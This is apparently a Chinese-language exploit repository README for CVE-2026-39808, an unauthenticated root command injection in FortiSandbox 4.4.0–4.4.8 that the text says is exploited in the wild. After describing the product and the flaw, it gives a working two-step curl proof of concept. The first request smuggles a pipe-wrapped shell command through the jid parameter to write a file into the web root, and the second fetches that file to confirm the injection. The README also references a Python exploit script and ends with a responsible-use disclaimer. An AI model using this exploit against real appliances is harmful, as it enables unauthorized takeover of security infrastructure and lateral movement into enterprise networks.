Fortinet FortiSandbox 4.4.0-4.4.8 - 通过 tracer-behavior 端点实现的操作系统命令注入
Fortinet FortiSandbox 是一种高级威胁防护解决方案,它创建隔离环境来分析可疑文件、URL 和网络流量中的恶意行为。它结合了静态分析、动态分析、AI 驱动的机器学习以及来自 FortiGuard 的威胁情报,用于检测绕过传统基于签名的防御的零日威胁、规避型恶意软件、勒索软件和定向攻击。企业应部署 FortiSandbox 以防范新兴威胁——尤其是未知恶意软件和高级持续性威胁(APT);通过在可疑内容到达生产系统之前,在安全、隔离的环境中自动引爆这些内容。它与更广泛的 Fortinet Security Fabric 集成,并且可以部署为 物理设备、虚拟机、云服务 或 容器化解决方案,以适应各种网络架构。
CVE-2026-39808 是一个严重的 操作系统命令注入漏洞,影响 FortiSandbox 4.4.0 至 4.4.8 版本。该缺陷源于在将用户可控输入用于操作系统命令构造(CWE-78)之前,未能在其中正确中和特殊元素,具体影响某个未指定的 API 端点。未经身份验证的攻击者可以通过发送特制的 HTTP 请求来利用此漏洞,在底层系统上以 root 权限 执行 任意操作系统命令。成功利用将使攻击者完全控制 FortiSandbox 设备,从而能够访问已分析的恶意软件样本、窃取敏感配置数据、渗透到相连的网络网段,或将受感染设备作为在企业环境中进一步横向移动的跳板。该漏洞正在野外被积极利用。
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
"http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
python CVE-2026-39808-X7.py
本仓库及其内容严格仅用于合法的安全研究、经授权的渗透测试、教育学习和防御目的。通过访问或使用这些材料,您确认您完全负责确保您的活动符合所有适用法律,并且您已获得适当授权,然后才对您不拥有的任何系统进行测试或应用这些技术。
本项目的作者和维护者不对因使用这些信息而造成的任何损害、法律后果或滥用承担责任。任何用于未经授权访问、恶意活动或非法目的的使用均被明确禁止且不受支持。
请负责任地使用。请遵守法律。只测试您拥有的或有明确书面许可进行测试的系统。
SCT-PL